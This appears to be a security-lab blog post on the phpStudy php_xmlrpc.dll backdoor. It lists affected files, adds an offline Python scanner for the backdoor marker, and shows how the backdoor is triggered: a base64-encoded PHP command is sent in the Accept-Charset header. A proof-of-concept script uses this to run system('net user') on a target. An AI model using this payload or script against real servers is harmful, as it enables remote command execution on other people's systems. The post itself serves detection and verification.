Frieza

MS08067 Security Lab


Affected versions:

  • phpStudy2016
    • php\php-5.2.17\ext\php_xmlrpc.dll
    • php\php-5.4.45\ext\php_xmlrpc.dll
  • phpStudy2018
    • PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll
    • PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll

Preconditions:

  • The php_xmlrpc.dll extension is loaded, and the file contains the string @eval(%s('%s'))
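Because the precondition is a fixed marker string inside a known set of files, the backdoor can be checked for offline, without sending any request to the server. The following is an added example and not part of the original post: it walks the four DLL paths listed above under a phpStudy install directory given on the command line (an assumption; the post does not say where phpStudy is installed), reports whether each file contains the @eval(%s('%s')) marker, and records the SHA-256 so the file can later be compared against a known-good copy of the extension. A "clean" result only means this particular marker is absent.

```python
import hashlib
import os
import sys

# Marker string the post says is present inside the backdoored php_xmlrpc.dll.
BACKDOOR_MARKER = b"@eval(%s('%s'))"

# DLL locations listed in the post, relative to the phpStudy install directory.
# Which of them exist depends on whether this is a 2016 or a 2018 install.
CANDIDATE_PATHS = [
    r"php\php-5.2.17\ext\php_xmlrpc.dll",
    r"php\php-5.4.45\ext\php_xmlrpc.dll",
    r"PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll",
    r"PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll",
]


def scan_bytes(data, marker=BACKDOOR_MARKER):
    """Inspect the raw contents of one DLL.

    Returns the SHA-256 of the data (for comparison against a known-good copy)
    and whether the backdoor marker occurs anywhere in it.
    """
    return {
        "sha256": hashlib.sha256(data).hexdigest(),
        "backdoored": marker in data,
    }


def scan_file(path):
    """Read one DLL from disk and scan it; a missing file is reported, not fatal."""
    result = {"path": path, "exists": False, "sha256": None, "backdoored": False}
    if not os.path.isfile(path):
        return result
    with open(path, "rb") as fh:
        data = fh.read()
    result["exists"] = True
    result.update(scan_bytes(data))
    return result


def scan_install(root):
    """Scan every candidate DLL under a phpStudy install root (assumed, e.g. C:\\phpStudy)."""
    results = []
    for rel in CANDIDATE_PATHS:
        # Split on the backslash so the join also works when run from a non-Windows host
        # (for example against a copied directory tree).
        results.append(scan_file(os.path.join(root, *rel.split("\\"))))
    return results


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("usage: python phpstudy_dll_check.py <phpStudy install directory>")
        sys.exit(1)
    for r in scan_install(sys.argv[1]):
        if not r["exists"]:
            print("missing    %s" % r["path"])
        elif r["backdoored"]:
            print("BACKDOORED %s sha256=%s" % (r["path"], r["sha256"]))
        else:
            print("clean      %s sha256=%s" % (r["path"], r["sha256"]))
```

The substring check is deliberately done on the raw bytes rather than on a decoded string, since the marker sits inside a binary PE file; the hash is printed alongside so that a DLL flagged here can be matched against the copy shipped in a trusted phpStudy download before it is replaced.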

Verification:

  • In Accept-Encoding, the space after the comma in "gzip, deflate" must be removed (send "gzip,deflate"), otherwise the command does not execute

  • The value of Accept-Charset is the command to execute, and it must be base64-encoded

  • Constructing the payload:

      // executes the command system('ipconfig') ;
      accept-charset:c3lzdGVtKCdpcGNvbmZpZycpIDs=

Verification script:

# -*- coding: utf-8 -*-

import base64
import sys

import requests


def Poc(ip):
    # A harmless test string; encode it the same way to get your own Accept-Charset value.
    payload = "echo \"hello phpstudy\";"
    pay = base64.b64encode(payload.encode('utf-8'))
    # Base64 of: echo system("net user");
    poc = "ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7"
    #poc = str(pay,"utf-8")
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
        "Connection": "close",
        # No space after the comma, otherwise the backdoor does not trigger
        "Accept-Encoding": "gzip,deflate",
        "Accept-Charset": poc,
        "Upgrade-Insecure-Requests": "1",
    }
    url = ip
    r = requests.get(url, headers=headers, timeout=10)
    #print(r.text)
    # The original wrote `"Administrator" or "DefaultAccount" in r.text`, which is always
    # true because the non-empty string literal is truthy; test each name separately.
    if "Administrator" in r.text or "DefaultAccount" in r.text:
        print("存在phpstudy后门")    # phpStudy backdoor present
    else:
        print("不存在phpstudy后门")  # phpStudy backdoor not present


if len(sys.argv) < 2:
    print("python phpstudy.py http://127.0.0.1")
else:
    Poc(sys.argv[1])
posted on 2021-03-30 14:00  Frieza_021